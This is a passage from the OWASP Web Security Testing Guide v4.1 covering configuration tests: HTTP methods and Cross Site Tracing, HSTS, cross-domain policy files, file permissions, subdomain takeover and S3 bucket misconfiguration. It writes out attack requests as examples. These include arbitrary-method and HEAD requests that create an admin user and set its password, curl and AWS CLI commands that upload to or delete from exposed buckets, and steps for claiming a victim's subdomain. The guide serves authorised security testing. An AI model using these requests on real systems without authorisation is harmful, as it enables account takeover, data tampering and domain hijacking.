parameters</p><p>https://www.zaproxy.org/docs/desktop/addons/forced-browse/</p><p>https://github.com/vanhauser-thc/thc-hydra</p><p>https://www.netsparker.com/blog/web-security/svn-digger-better-lists-for-forced-browsing/</p><p>https://portforward.com/router-password/</p><p>https://cirt.net/passwords</p><p>https://github.com/fuzzdb-project/fuzzdb/blob/f801f5c5adc9aa5e54f20d273d213c5ab58826b9/discovery/predictable-filepaths/login-file-locations/Logins.fuzz.txt</p><p>https://github.com/fuzzdb-project/fuzzdb/blob/f801f5c5adc9aa5e54f20d273d213c5ab58826b9/attack/business-logic/CommonDebugParamNames.fuzz.txt</p><p>Web Security Testing Guide v4.1</p><p>111</p><p>Test HTTP Methods</p><p>ID</p><p>WSTG-CONF-06</p><p>Summary</p><p>HTTP offers a number of methods that can be used to perform actions on the web server. Many of theses methods are</p><p>designed to aid developers in deploying and testing HTTP applications. These HTTP methods can be used for</p><p>nefarious purposes if the web server is misconfigured. Additionally, Cross Site Tracing (XST), a form of cross site</p><p>scripting using the server’s HTTP TRACE method, is examined. While GET and POST are by far the most common</p><p>methods that are used to access information provided by a web server, the Hypertext Transfer Protocol (HTTP) allows</p><p>several other (and somewhat less known) methods. RFC 2616 (which describes HTTP version 1.1 which is the</p><p>standard today) defines the following eight methods:</p><p>HEAD</p><p>GET</p><p>POST</p><p>PUT</p><p>DELETE</p><p>TRACE</p><p>OPTIONS</p><p>CONNECT</p><p>Some of these methods can potentially pose a security risk for a web application, as they allow an attacker to modify</p><p>the files stored on the web server and, in some scenarios, steal the credentials of legitimate users. More specifically, the</p><p>methods that should be disabled are the following:</p><p>PUT: This method allows a client to upload new files on the web server. An attacker can exploit it by uploading</p><p>malicious files (e.g.: an asp file that executes commands by invoking cmd.exe), or by simply using the victim’s</p><p>server as a file repository.</p><p>DELETE: This method allows a client to delete a file on the web server. An attacker can exploit it as a very simple</p><p>and direct way to deface a web site or to mount a DoS attack.</p><p>CONNECT: This method could allow a client to use the web server as a proxy.</p><p>TRACE: This method simply echoes back to the client whatever string has been sent to the server, and is used</p><p>mainly for debugging purposes. This method, originally assumed harmless, can be used to mount an attack known</p><p>as Cross Site Tracing, which has been discovered by Jeremiah Grossman (see links at the bottom of the page).</p><p>If an application needs one or more of these methods, such as REST Web Services (which may require PUT or</p><p>DELETE), it is important to check that their usage is properly limited to trusted users and safe conditions.</p><p>Arbitrary HTTP Methods</p><p>Arshan Dabirsiaghi (see links) discovered that many web application frameworks allowed well chosen or arbitrary</p><p>HTTP methods to bypass an environment level access control check:</p><p>Many frameworks and languages treat “HEAD” as a “GET” request, albeit one without any body in the response. If</p><p>a security constraint was set on “GET” requests such that only “authenticatedUsers” could access GET requests for</p><p>a particular servlet or resource, it would be bypassed for the “HEAD” version. This allowed unauthorized blind</p><p>submission of any privileged GET request.</p><p>Web Security Testing Guide v4.1</p><p>112</p><p>Some frameworks allowed arbitrary HTTP methods such as “JEFF” or “CATS” to be used without limitation. These</p><p>were treated as if a “GET” method was issued, and were found not to be subject to method role based access</p><p>control checks on a number of languages and frameworks, again allowing unauthorized blind submission of</p><p>privileged GET requests.</p><p>In many cases, code which explicitly checked for a “GET” or “POST” method would be safe.</p><p>How to Test</p><p>Discover the Supported Methods</p><p>To perform this test, the tester needs some way to figure out which HTTP methods are supported by the web server that</p><p>is being examined. The OPTIONS HTTP method provides the tester with the most direct and effective way to do that.</p><p>RFC 2616 states that, “The OPTIONS method represents a request for information about the communication options</p><p>available on the request/response chain identified by the Request-URI”.</p><p>The testing method is extremely straightforward and we only need to fire up netcat (or telnet):</p><p>$ nc www.victim.com 80</p><p>OPTIONS / HTTP/1.1</p><p>Host: www.victim.com</p><p>HTTP/1.1 200 OK</p><p>Server: Microsoft-IIS/5.0</p><p>Date: Tue, 31 Oct 2006 08:00:29 GMT</p><p>Connection: close</p><p>Allow: GET, HEAD, POST, TRACE, OPTIONS</p><p>Content-Length: 0</p><p>As we can see in the example, OPTIONS provides a list of the methods that are supported by the web server, and in this</p><p>case we can see that TRACE method is enabled. The danger that is posed by this method is illustrated in the following</p><p>section</p><p>The same test can also be executed using nmap and the http-methods NSE script:</p><p>C:\Tools\nmap-6.40>nmap -p 443 --script http-methods</p><p>localhost</p><p>Starting Nmap 6.40 ( http://nmap.org ) at 2015-11-04 11:52 Romance Standard Time</p><p>Nmap scan report for localhost (127.0.0.1)</p><p>Host is up (0.0094s latency).</p><p>PORT STATE SERVICE</p><p>443/tcp open https</p><p>| http-methods: OPTIONS TRACE GET HEAD POST</p><p>| Potentially risky methods: TRACE</p><p>|_See http://nmap.org/nsedoc/scripts/http-methods.html</p><p>Nmap done: 1 IP address (1 host up) scanned in 20.48 seconds</p><p>Test XST Potential</p><p>Note: in order to understand the logic and the goals of this attack one must be familiar with Cross Site Scripting attacks.</p><p>The TRACE method, while apparently harmless, can be successfully leveraged in some scenarios to steal legitimate</p><p>users’ credentials. This attack technique was discovered by Jeremiah Grossman in 2003, in an attempt to bypass the</p><p>HTTPOnly tag that Microsoft introduced in Internet Explorer 6 SP1 to protect cookies from being accessed by</p><p>JavaScript. As a matter of fact, one of the most recurring attack patterns in Cross Site Scripting is to access the</p><p>document.cookie object and send it to a web server controlled by the attacker so that he or she can hijack the victim’s</p><p>https://owasp.org/www-community/attacks/xss/</p><p>https://owasp.org/www-community/HttpOnly</p><p>Web Security Testing Guide v4.1</p><p>113</p><p>session. Tagging a cookie as httpOnly forbids JavaScript from accessing it, protecting it from being sent to a third party.</p><p>However, the TRACE method can be used to bypass this protection and access the cookie even in this scenario.</p><p>As mentioned before, TRACE simply returns any string that is sent to the web server. In order to verify its presence (or to</p><p>double-check the results of the OPTIONS request shown above), the tester can proceed as shown in the following</p><p>example:</p><p>$ nc www.victim.com 80</p><p>TRACE / HTTP/1.1</p><p>Host: www.victim.com</p><p>HTTP/1.1 200 OK</p><p>Server: Microsoft-IIS/5.0</p><p>Date: Tue, 31 Oct 2006 08:01:48 GMT</p><p>Connection: close</p><p>Content-Type: message/http</p><p>Content-Length: 39</p><p>TRACE / HTTP/1.1</p><p>Host: www.victim.com</p><p>The response body is exactly a copy of our original request, meaning that the target allows this method. Now, where is</p><p>the danger lurking? If the tester instructs a browser to issue a TRACE request to the web server, and this browser has a</p><p>cookie for that domain, the cookie will be automatically included in the request headers, and will therefore be echoed</p><p>back in the resulting response. At that point, the cookie string will be accessible by JavaScript and it will be finally</p><p>possible to send it to a third party even when the cookie is tagged as httpOnly.</p><p>There are multiple ways to make a browser issue a TRACE request, such as the XMLHTTP ActiveX control in Internet</p><p>Explorer and XMLDOM in Mozilla and Netscape. However, for security reasons the browser is allowed to start a</p><p>connection only to the domain where the hostile script resides. This is a mitigating factor, as the attacker needs to</p><p>combine the TRACE method with another vulnerability in order to mount the attack.</p><p>An attacker has two ways to successfully launch a Cross Site Tracing attack:</p><p>Leveraging another server-side vulnerability: the attacker injects the hostile JavaScript snippet that contains the</p><p>TRACE request in the vulnerable application, as in a normal Cross Site Scripting attack</p><p>Leveraging a client-side vulnerability: the attacker creates a malicious website that contains the hostile JavaScript</p><p>snippet and exploits some cross-domain vulnerability of the browser of the victim, in order to make the JavaScript</p><p>code successfully perform a connection to the site that supports the TRACE method and that originated the cookie</p><p>that the attacker is trying to steal.</p><p>More detailed information, together with code samples, can be found in the original whitepaper written by Jeremiah</p><p>Grossman.</p><p>Testing for Arbitrary HTTP Methods</p><p>Find a page to visit that has a security constraint such that it would normally force a 302 redirect to a log in page or</p><p>forces a log in directly. The test URL in this example works like this, as do many web applications. However, if a tester</p><p>obtains a “200” response that is not a log in page, it is possible to bypass authentication and thus authorization.</p><p>$ nc www.example.com 80</p><p>JEFF / HTTP/1.1</p><p>Host: www.example.com</p><p>HTTP/1.1 200 OK</p><p>Date: Mon, 18 Aug 2008 22:38:40 GMT</p><p>Server: Apache</p><p>Set-Cookie: PHPSESSID=K53QW...</p><p>Web Security Testing Guide v4.1</p><p>114</p><p>If the framework or firewall or application does not support the “JEFF” method, it should issue an error page (or</p><p>preferably a 405 Not Allowed or 501 Not implemented error page). If it services the request, it is vulnerable to this issue.</p><p>If the tester feels that the system is vulnerable to this issue, they should issue CSRF-like attacks to exploit the issue</p><p>more fully:</p><p>FOOBAR /admin/createUser.php?member=myAdmin</p><p>JEFF /admin/changePw.php?member=myAdmin&passwd=foo123&confirm=foo123</p><p>CATS /admin/groupEdit.php?group=Admins&member=myAdmin&action=add</p><p>With some luck, using the above three commands - modified to suit the application under test and testing requirements</p><p>- a new user would be created, a password assigned, and made an administrator.</p><p>Testing for HEAD Access Control Bypass</p><p>Find a page to visit that has a security constraint such that it would normally force a 302 redirect to a log in page or</p><p>forces a log in directly. The test URL in this example works like this, as do many web applications. However, if the tester</p><p>obtains a “200” response that is not a login page, it is possible to bypass authentication and thus authorization.</p><p>$ nc www.example.com 80</p><p>HEAD /admin HTTP/1.1</p><p>Host: www.example.com</p><p>HTTP/1.1 200 OK</p><p>Date: Mon, 18 Aug 2008 22:44:11 GMT</p><p>Server: Apache</p><p>Set-Cookie: PHPSESSID=pKi...; path=/; HttpOnly</p><p>Expires: Thu, 19 Nov 1981 08:52:00 GMT</p><p>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0</p><p>Pragma: no-cache</p><p>Set-Cookie: adminOnlyCookie1=...; expires=Tue, 18-Aug-2009 22:44:31 GMT; domain=www.example.com</p><p>Set-Cookie: adminOnlyCookie2=...; expires=Mon, 18-Aug-2008 22:54:31 GMT; domain=www.example.com</p><p>Set-Cookie: adminOnlyCookie3=...; expires=Sun, 19-Aug-2007 22:44:30 GMT; domain=www.example.com</p><p>Content-Language: EN</p><p>Connection: close</p><p>Content-Type: text/html; charset=ISO-8859-1</p><p>If the tester gets a “405 Method not allowed” or “501 Method Unimplemented”, the target</p><p>(application/framework/language/system/firewall) is working correctly. If a “200” response code comes back, and the</p><p>response contains no body, it’s likely that the application has processed the request without authentication or</p><p>authorization and further testing is warranted.</p><p>If the tester thinks that the system is vulnerable to this issue, they should issue CSRF-like attacks to exploit the issue</p><p>more fully:</p><p>HEAD /admin/createUser.php?member=myAdmin</p><p>HEAD /admin/changePw.php?member=myAdmin&passwd=foo123&confirm=foo123</p><p>HEAD /admin/groupEdit.php?group=Admins&member=myAdmin&action=add</p><p>With some luck, using the above three commands - modified to suit the application under test and testing requirements</p><p>- a new user would be created, a password assigned, and made an administrator, all using blind request submission.</p><p>Tools</p><p>NetCat</p><p>cURL</p><p>nmap http-methods NSE script</p><p>http://nc110.sourceforge.net/</p><p>https://curl.haxx.se/</p><p>https://nmap.org/nsedoc/scripts/http-methods.html</p><p>Web Security Testing Guide v4.1</p><p>115</p><p>References</p><p>Whitepapers</p><p>RFC 2616: “Hypertext Transfer Protocol – HTTP/1.1”</p><p>RFC 2109 and RFC 2965: “HTTP State Management Mechanism”</p><p>Jeremiah Grossman: “Cross Site Tracing (XST)</p><p>Amit Klein: “XS(T) attack variants which can, in some cases, eliminate the need for TRACE”</p><p>https://tools.ietf.org/html/rfc2616</p><p>https://tools.ietf.org/html/rfc2109</p><p>https://tools.ietf.org/html/rfc2965</p><p>https://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf</p><p>https://www.securityfocus.com/archive/107/308433</p><p>Web Security Testing Guide v4.1</p><p>116</p><p>Test HTTP Strict Transport Security</p><p>ID</p><p>WSTG-CONF-07</p><p>Summary</p><p>The HTTP Strict Transport Security (HSTS) header is a mechanism that web sites have to communicate to the web</p><p>browsers</p><p>that all traffic exchanged with a given domain must always be sent over https, this will help protect the</p><p>information from being passed over unencrypted requests.</p><p>Considering the importance of this security measure it is important to verify that the web site is using this HTTP header,</p><p>in order to ensure that all the data travels encrypted from the web browser to the server.</p><p>The HTTP Strict Transport Security (HSTS) feature lets a web application to inform the browser, through the use of a</p><p>special response header, that it should never establish a connection to the the specified domain servers using HTTP.</p><p>Instead it should automatically establish all connection requests to access the site through HTTPS.</p><p>The HTTP strict transport security header uses two directives:</p><p>max-age: to indicate the number of seconds that the browser should automatically convert all HTTP requests to</p><p>HTTPS.</p><p>includeSubDomains: to indicate that all web application’s sub-domains must use HTTPS.</p><p>Here’s an example of the HSTS header implementation:</p><p>Strict-Transport-Security: max-age=60000; includeSubDomains</p><p>The use of this header by web applications must be checked to find if the following security issues could be produced:</p><p>Attackers sniffing the network traffic and accessing the information transferred through an unencrypted channel.</p><p>Attackers exploiting a man in the middle attack because of the problem of accepting certificates that are not trusted.</p><p>Users who mistakenly entered an address in the browser putting HTTP instead of HTTPS, or users who click on a</p><p>link in a web application which mistakenly indicated the HTTP protocol.</p><p>How to Test</p><p>Testing for the presence of HSTS header can be done by checking for the existence of the HSTS header in the server’s</p><p>response in an interception proxy, or by using curl as follows:</p><p>$ curl -s -D- https://owasp.org | grep Strict</p><p>Strict-Transport-Security: max-age=15768000</p><p>References</p><p>OWASP HTTP Strict Transport Security</p><p>OWASP Appsec Tutorial Series - Episode 4: Strict Transport Security</p><p>HSTS Specification</p><p>https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html</p><p>https://www.youtube.com/watch?v=zEV3HOuM_Vw</p><p>https://tools.ietf.org/html/rfc6797</p><p>Web Security Testing Guide v4.1</p><p>117</p><p>Test RIA Cross Domain Policy</p><p>ID</p><p>WSTG-CONF-08</p><p>Summary</p><p>Rich Internet Applications (RIA) have adopted Adobe’s crossdomain.xml policy files to allow for controlled cross</p><p>domain access to data and service consumption using technologies such as Oracle Java, Silverlight, and Adobe Flash.</p><p>Therefore, a domain can grant remote access to its services from a different domain. However, often the policy files that</p><p>describe the access restrictions are poorly configured. Poor configuration of the policy files enables Cross-site Request</p><p>Forgery attacks, and may allow third parties to access sensitive data meant for the user.</p><p>What are cross-domain policy files?</p><p>A cross-domain policy file specifies the permissions that a web client such as Java, Adobe Flash, Adobe Reader, etc.</p><p>use to access data across different domains. For Silverlight, Microsoft adopted a subset of the Adobe’s</p><p>crossdomain.xml, and additionally created it’s own cross-domain policy file: clientaccesspolicy.xml.</p><p>Whenever a web client detects that a resource has to be requested from other domain, it will first look for a policy file in</p><p>the target domain to determine if performing cross-domain requests, including headers, and socket-based connections</p><p>are allowed.</p><p>Master policy files are located at the domain’s root. A client may be instructed to load a different policy file but it will</p><p>always check the master policy file first to ensure that the master policy file permits the requested policy file.</p><p>Crossdomain.xml vs. Clientaccesspolicy.xml</p><p>Most RIA applications support crossdomain.xml. However in the case of Silverlight, it will only work if the</p><p>crossdomain.xml specifies that access is allowed from any domain. For more granular control with Silverlight,</p><p>clientaccesspolicy.xml must be used.</p><p>Policy files grant several types of permissions:</p><p>Accepted policy files (Master policy files can disable or restrict specific policy files)</p><p>Sockets permissions</p><p>Header permissions</p><p>HTTP/HTTPS access permissions</p><p>Allowing access based on cryptographic credentials</p><p>An example of an overly permissive policy file:</p><p><?xml version="1.0"?></p><p><!DOCTYPE cross-domain-policy SYSTEM</p><p>"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"></p><p><cross-domain-policy></p><p><site-control permitted-cross-domain-policies="all"/></p><p><allow-access-from domain="*" secure="false"/></p><p><allow-http-request-headers-from domain="*" headers="*" secure="false"/></p><p></cross-domain-policy></p><p>How can cross domain policy files can be abused?</p><p>Overly permissive cross-domain policies.</p><p>Web Security Testing Guide v4.1</p><p>118</p><p>Generating server responses that may be treated as cross-domain policy files.</p><p>Using file upload functionality to upload files that may be treated as cross-domain policy files.</p><p>Impact of Abusing Cross-Domain Access</p><p>Defeat CSRF protections.</p><p>Read data restricted or otherwise protected by cross-origin policies.</p><p>How to Test</p><p>Testing for RIA Policy Files Weakness</p><p>To test for RIA policy file weakness the tester should try to retrieve the policy files crossdomain.xml and</p><p>clientaccesspolicy.xml from the application’s root, and from every folder found.</p><p>For example, if the application’s URL is http://www.owasp.org , the tester should try to download the files</p><p>http://www.owasp.org/crossdomain.xml and http://www.owasp.org/clientaccesspolicy.xml .</p><p>After retrieving all the policy files, the permissions allowed should be be checked under the least privilege principle.</p><p>Requests should only come from the domains, ports, or protocols that are necessary. Overly permissive policies should</p><p>be avoided. Policies with * in them should be closely examined.</p><p>Example</p><p><cross-domain-policy></p><p><allow-access-from domain="*" /></p><p></cross-domain-policy></p><p>Result Expected</p><p>A list of policy files found.</p><p>A list of weak settings in the policies.</p><p>Tools</p><p>Nikto</p><p>OWASP Zed Attack Proxy Project</p><p>W3af</p><p>References</p><p>Whitepapers</p><p>UCSD: Analyzing the Crossdomain Policies of Flash Applications</p><p>Adobe: “Cross-domain policy file specification”</p><p>Adobe: “Cross-domain policy file usage recommendations for Flash Player”</p><p>Oracle: “Cross-Domain XML Support”</p><p>MSDN: “Making a Service Available Across Domain Boundaries”</p><p>MSDN: “Network Security Access Restrictions in Silverlight”</p><p>Stefan Esser: “Poking new holes with Flash Crossdomain Policy Files”</p><p>Jeremiah Grossman: “Crossdomain.xml Invites Cross-site Mayhem”</p><p>Google Doctype: “Introduction to Flash security”</p><p>http://cseweb.ucsd.edu/~hovav/dist/crossdomain.pdf</p><p>http://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html</p><p>http://www.adobe.com/devnet/flashplayer/articles/cross_domain_policy.html</p><p>http://www.oracle.com/technetwork/java/javase/plugin2-142482.html#CROSSDOMAINXML</p><p>http://msdn.microsoft.com/en-us/library/cc197955(v=vs.95).aspx</p><p>http://msdn.microsoft.com/en-us/library/cc645032(v=vs.95).aspx</p><p>http://www.hardened-php.net/library/poking_new_holes_with_flash_crossdomain_policy_files.html</p><p>http://jeremiahgrossman.blogspot.com/2008/05/crossdomainxml-invites-cross-site.html</p><p>http://code.google.com/p/doctype-mirror/wiki/ArticleFlashSecurity</p><p>Web Security Testing Guide v4.1</p><p>119</p><p>Test File Permission</p><p>ID</p><p>WSTG-CONF-09</p><p>Summary</p><p>When a resource is given a permissions setting that provides access to a wider range of actors than required, it could</p><p>lead to the exposure of sensitive information, or the modification of that resource by unintended parties. This is</p><p>especially dangerous when the resource is related to program configuration, execution, or sensitive user data.</p><p>A clear example is an execution file that is executable by unauthorized users. For another example, account</p><p>information or a token value to access an API - increasingly seen in modern web services or microservices - may be</p><p>stored in a configuration file whose permissions are set to world-readable from</p><p>the installation by default. Such</p><p>sensitive data can be exposed by internal malicious actors of the host or by a remote attacker who compromised the</p><p>service with other vulnerabilities but obtained only a normal user privilege.</p><p>How to Test</p><p>In Linux, use ls command to check the file permissions. Alternatively, namei can also be used to recursively list file</p><p>permissions.</p><p>$ namei -l /PathToCheck/</p><p>The files and directories that require file permission testing include but are not limited to:</p><p>Web files/directory</p><p>Configuration files/directory</p><p>Sensitive files (encrypted data, password, key)/directory</p><p>Log files (security logs, operation logs, admin logs)/directory</p><p>Executables (scripts, EXE, JAR, class, PHP, ASP)/directory</p><p>Database files/directory</p><p>Temp files /directory</p><p>Upload files/directory</p><p>Tools</p><p>Windows AccessEnum</p><p>Windows AccessChk</p><p>Linux namei</p><p>Remediation</p><p>Set the permissions of the files and directories properly so that unauthorized users cannot access critical resources</p><p>unnecessarily.</p><p>References</p><p>CWE-732: Incorrect Permission Assignment for Critical Resource</p><p>https://technet.microsoft.com/en-us/sysinternals/accessenum</p><p>https://technet.microsoft.com/en-us/sysinternals/accesschk</p><p>https://linux.die.net/man/1/namei</p><p>https://cwe.mitre.org/data/definitions/732.html</p><p>Web Security Testing Guide v4.1</p><p>120</p><p>Test for Subdomain Takeover</p><p>ID</p><p>WSTG-CONF-10</p><p>Summary</p><p>A successful exploitation of this kind of vulnerability allows an adversary to claim and take control of the victim’s</p><p>subdomain. This attack relies on the following:</p><p>1. The victim’s external DNS server subdomain record is configured to point to a non-existing or non-active</p><p>resource/external service/endpoint. The proliferation of XaaS (Anything as a Service) products and public cloud</p><p>services offer a lot of potential targets to consider.</p><p>2. The service provider hosting the resource/external service/endpoint does not handle subdomain ownership</p><p>verification properly.</p><p>If the subdomain takeover is successful a wide variety of attacks are possible (serving malicious content, phising,</p><p>stealing user session cookies, credentials, etc.). This vulnerability could be exploited for a wide variety of DNS resource</p><p>records including: A, CNAME, MX, NS, etc. In terms of the attack severity an NS subdomain takeover (although less</p><p>likely) has the highest impact because a successful attack could result in full control over the whole DNS zone and the</p><p>victim’s domain.</p><p>Example1 - GitHub</p><p>1. The victim (victim.com) uses GitHub for development and configured a DNS record (coderepo.victim.com) to</p><p>access it.</p><p>2. The victim decides to migrate their code repository from GitHub to a commercial platform and does not remove</p><p>coderepo.victim.com from their DNS server.</p><p>3. An adversary finds out that coderepo.victim.com is hosted on GitHub and uses GitHub Pages to claim</p><p>coderepo.victim.com using his/her GitHub account.</p><p>Example2 - Expired Domain</p><p>1. The victim (victim.com) owns another domain (victimotherdomain.com) and uses a CNAME record (www) to</p><p>reference the other domain ( www.victim.com –> victimotherdomain.com )</p><p>2. At some point, victimotherdomain.com expires and is available for registration by anyone. Since the CNAME</p><p>record is not deleted from the victim.com DNS zone, anyone who registers victimotherdomain.com has full</p><p>control over www.victim.com until the DNS record is present.</p><p>How to Test</p><p>Black-Box Testing</p><p>The first step is to enumerate the victim DNS servers and resource records. There are multiple ways to accomplish this</p><p>task, for example DNS enumeration using a list of common subdomains dictionary, DNS brute force or using web</p><p>search engines and other OSINT data sources.</p><p>Using the dig command the tester looks for the following DNS server response messages that warrant further</p><p>investigation: NXDOMAIN|SERVFAIL|REFUSED|no servers could be reached.</p><p>Testing DNS A, CNAME Record Subdomain Takeover</p><p>Perform a basic DNS enumeration on the victim’s domain (victim.com) using dnsrecon:</p><p>Web Security Testing Guide v4.1</p><p>121</p><p>$ ./dnsrecon.py -d victim.com</p><p>[*] Performing General Enumeration of Domain: victim.com</p><p>...</p><p>[-] DNSSEC is not configured for victim.com</p><p>[*] A subdomain.victim.com 192.30.252.153</p><p>[*] CNAME subdomain1.victim.com fictioussubdomain.victim.com</p><p>...</p><p>Identify which DNS resource records are dead and point to inactive/not-used services. Using the dig command for the</p><p>CNAME record:</p><p>$ dig CNAME fictioussubdomain.victim.com</p><p>; <<>> DiG 9.10.3-P4-Ubuntu <<>> ns victim.com</p><p>;; global options: +cmd</p><p>;; Got answer:</p><p>;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42950</p><p>;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1</p><p>The following DNS responses warrant further investigation: NXDOMAIN</p><p>To test the A record the tester performs a whois database lookup and identifies GitHub as the service provider:</p><p>$ whois 192.30.252.153 | grep "OrgName"</p><p>OrgName: GitHub, Inc.</p><p>The tester visits subdomain.victim.com or issues a HTTP GET request which returns a “404 - File not found” response</p><p>which is a clear indication of the vulnerability.</p><p>Figure 4.2.10-1: GitHub 404 File Not Found response</p><p>The tester claims the domain using GitHub Pages:</p><p>Web Security Testing Guide v4.1</p><p>122</p><p>Figure 4.2.10-2: GitHub claim domain</p><p>Testing NS Record Subdomain Takeover</p><p>Identify all nameservers for the domain in scope:</p><p>$ dig ns victim.com +short</p><p>ns1.victim.com</p><p>nameserver.expireddomain.com</p><p>In this fictious example the tester checks if the domain expireddomain.com is active with a domain registrar search. If</p><p>the domain is available for purchase the subdomain is vulnerable.</p><p>The following DNS responses warrant further investigation: SERVFAIL/REFUSED</p><p>Gray-Box Testing</p><p>The tester has the DNS zone file available which means DNS enumeration is not necessary. The testing methodology</p><p>is the same.</p><p>Remediation</p><p>To mitigate the risk of subdomain takeover the vulnerable DNS resource record(s) should be removed from the DNS</p><p>zone. Continous monitoring and periodic checks are recommended as best practice.</p><p>References</p><p>1. HackerOne - A Guide To Subdomain Takeovers</p><p>2. Subdomain Takeover: Basics</p><p>3. Subdomain Takeover: Going beyond CNAME</p><p>4. OWASP AppSec Europe 2017 - Frans Rosén: DNS hijacking using cloud providers – no verification needed</p><p>https://www.hackerone.com/blog/Guide-Subdomain-Takeovers</p><p>https://0xpatrik.com/subdomain-takeover-basics/</p><p>https://0xpatrik.com/subdomain-takeover-ns/</p><p>https://2017.appsec.eu/presos/Developer/DNS%20hijacking%20using%20cloud%20providers%20%E2%80%93%20no%20verification%20needed%20-%20Frans%20Rosen%20-%20OWASP_AppSec-Eu_2017.pdf</p><p>Web Security Testing Guide v4.1</p><p>123</p><p>Tools</p><p>1. dig - man page</p><p>2. recon-ng - Web Reconnaissance framework</p><p>3. theHarvester - OSINT intelligence gathering tool</p><p>4. Sublist3r - OSINT subdomain enumeration tool</p><p>5. dnsrecon - DNS Enumeration Script</p><p>6. OWASP Amass DNS enumeration</p><p>https://linux.die.net/man/1/dig</p><p>https://github.com/lanmaster53/recon-ng</p><p>https://github.com/laramies/theHarvester</p><p>https://github.com/aboul3la/Sublist3r</p><p>https://github.com/darkoperator/dnsrecon</p><p>https://github.com/OWASP/Amass</p><p>Web Security Testing Guide v4.1</p><p>124</p><p>Test Cloud Storage</p><p>ID</p><p>WSTG-CONF-11</p><p>Summary</p><p>Cloud storage services facilitate web application and services to store and access objects in the storage service.</p><p>Improper access control configuration, however, may result in sensitive information exposure, data being tampered, or</p><p>unauthorized access.</p><p>A known example is where an Amazon S3 bucket is misconfigured, although the other cloud storage services may also</p><p>be exposed to similar risks. By default, all S3 buckets are private and can be accessed only by users that are explicitly</p><p>granted access. Users can grant public access to both the bucket itself and to individual objects stored within that</p><p>bucket. This may lead to an unauthorized user being able to upload new files, modify or read stored files.</p><p>Test Objectives</p><p>Assess whether Cloud Storage Service’s access control configuration is properly in place.</p><p>How to Test</p><p>First identify the URL to</p><p>access the data in the storage service, and then consider the following tests:</p><p>read the unauthorized data</p><p>upload a new arbitrary file</p><p>You may use curl for the tests with the following commands and see if unauthorized actions can be performed</p><p>successfully.</p><p>To test the ability to read an object:</p><p>curl -X GET https://<cloud-storage-service>/<object></p><p>To test the ability to upload a file:</p><p>curl -X PUT -d 'test' 'https://<cloud-storage-service>/test.txt'</p><p>Testing for Amazon S3 Bucket Misconfiguration</p><p>The Amazon S3 bucket URLs follow one of two formats, either virtual host style or path-style.</p><p>Virtual Hosted Style Access</p><p>https://bucket-name.s3.Region.amazonaws.com/key-name</p><p>In the following example, my-bucket is the bucket name, us-west-2 is the region, and puppy.png is the key-name:</p><p>https://my-bucket.s3.us-west-2.amazonaws.com/puppy.png</p><p>Path-Style Access</p><p>https://s3.Region.amazonaws.com/bucket-name/key-name</p><p>As above, in the following example, my-bucket is the bucket name, us-west-2 is the region, and puppy.png is the</p><p>key-name:</p><p>Web Security Testing Guide v4.1</p><p>125</p><p>https://s3.us-west-2.amazonaws.com/my-bucket/puppy.jpg</p><p>For some regions, the legacy global endpoint that does not specify a region-specific endpoint can be used. Its format is</p><p>also either virtual hosted style or path-style.</p><p>Virtual Hosted Style Access</p><p>https://bucket-name.s3.amazonaws.com</p><p>Path-Style Access</p><p>https://s3.amazonaws.com/bucket-name</p><p>Identify Bucket URL</p><p>For black-box testing, S3 URLs can be found in the HTTP messages. The following example shows a bucket URL is</p><p>sent in the img tag in a HTTP response.</p><p>...</p><p><img src="https://my-bucket.s3.us-west-2.amazonaws.com/puppy.png"></p><p>...</p><p>For gray-box testing, you can obtain bucket URLs from Amazon’s web interface, documents, source code, or any other</p><p>available sources.</p><p>Testing with AWS CLI Tool</p><p>In addition to testing with curl, you can also test with the AWS Command Line Interface (CLI) tool. In this case s3://</p><p>protocol is used.</p><p>List</p><p>The following command lists all the objects of the bucket when it is configured public.</p><p>aws s3 ls s3://<bucket-name></p><p>Upload</p><p>The following is the command to upload a file</p><p>aws s3 cp arbitrary-file s3://bucket-name/path-to-save</p><p>This example shows the result when the upload has been successful.</p><p>$ aws s3 cp test.txt s3://bucket-name/test.txt</p><p>upload: ./test.txt to s3://bucket-name/test.txt</p><p>This example shows the result when the upload has failed.</p><p>$ aws s3 cp test.txt s3://bucket-name/test.txt</p><p>upload failed: ./test2.txt to s3://bucket-name/test2.txt An error occurred (AccessDenied) when</p><p>calling the PutObject operation: Access Denied</p><p>Remove</p><p>The following is the command to remove an object</p><p>aws s3 rm s3://bucket-name/object-to-remove</p><p>Web Security Testing Guide v4.1</p><p>126</p><p>Tools</p><p>AWS Command Line Interface</p><p>References</p><p>Working with Amazon S3 Buckets</p><p>https://aws.amazon.com/cli/</p><p>https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingBucket.html</p><p>Web Security Testing Guide v4.1</p><p>127</p><p>4.3 Identity Management Testing</p><p>4.3.1 Test Role Definitions</p><p>4.3.2 Test User Registration Process</p><p>4.3.3 Test Account Provisioning Process</p><p>4.3.4 Testing for Account Enumeration and Guessable User Account</p><p>4.3.5 Testing for Weak or Unenforced Username Policy</p><p>Web Security Testing Guide v4.1</p><p>128</p><p>Test Role Definitions</p><p>ID</p><p>WSTG-IDNT-01</p><p>Summary</p><p>It is common in modern enterprises to define system roles to manage users and authorization to system resources. In</p><p>most system implementations it is expected that at least two roles exist, administrators and regular users. The first</p><p>representing a role that permits access to privileged and sensitive functionality and information, the second</p><p>representing a role that permits access to regular business functionality and information. Well developed roles should</p><p>align with business processes which are supported by the application.</p><p>It is important to remember that cold, hard authorization isn’t the only way to manage access to system objects. In more</p><p>trusted environments where confidentiality is not critical, softer controls such as application workflow and audit logging</p><p>can support data integrity requirements while not restricting user access to functionality or creating complex role</p><p>structures that are difficult to manage. Its important to consider the Goldilocks principle when role engineering, in that</p><p>defining too few, broad roles (thereby exposing access to functionality users don’t require) is as bad as too many, tightly</p><p>tailored roles (thereby restricting access to functionality users do require).</p><p>Test Objectives</p><p>Validate the system roles defined within the application sufficiently define and separate each system and business role</p><p>to manage appropriate access to system functionality and information.</p><p>How to Test</p><p>Either with or without the help of the system developers or administrators, develop an role versus permission matrix.</p><p>The matrix should enumerate all the roles that can be 